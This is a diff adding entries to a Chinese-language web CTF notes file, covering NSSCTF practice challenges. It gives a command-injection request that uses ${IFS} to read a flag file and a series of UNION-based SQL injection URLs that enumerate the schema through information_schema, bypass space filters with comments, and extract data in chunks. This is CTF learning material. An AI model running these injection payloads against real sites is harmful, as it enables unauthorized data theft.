--- a/23-Monoceros406/Web做题(1-20).md
+++ b/23-Monoceros406/Web做题(1-20).md
@@ -301,5 +301,57 @@ print(response1.text[-85:-41])
 ## 18.[SWPUCTF 2021 新生赛]babyrce
 
 ```python
-
+import requests
+response1=requests.get(r'http://node5.anna.nssctf.cn:28769/rasalghul.php?url=cat${IFS}/flllllaaaaaaggggggg')
+print(response1.text[-45:])
 ```
+
+## 19.[SWPUCTF 2021 新生赛]sql
+
+爆列数：
+
+```url
+http://node4.anna.nssctf.cn:28915/?wllm=1'order/**/by/**/3%23
+http://node4.anna.nssctf.cn:28915/?wllm=1'order/**/by/**/3%23
+```
+
+爆列，当wllm为1时返回结果无法显示，选择-1查询不到，并找出select可用列：
+
+```url
+http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,3%23
+```
+
+爆库：
+
+```url
+http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,database()%23
+```
+
+爆表：
+
+```url
+http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23
+```
+
+爆列：
+
+```url
+http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/'test_db'%23
+```
+
+爆flag：
+
+```url
+http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,group_concat(flag)/**/from/**/test_db.LTLT_flag%23
+```
+
+一次只有20位，采取截断，一次一次输出：
+
+```url
+http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),20,20)/**/from/**/test_db.LTLT_flag%23
+http://node4.anna.nssctf.cn:28915/?wllm=-1'union/**/select/**/1,2,mid(group_concat(flag),40,20)/**/from/**/test_db.LTLT_flag%23
+```
+
+## 20.[LitCTF 2023]1zjs
+
+JsFuck，在这里解密：http://codertab.com/JsUnFuck
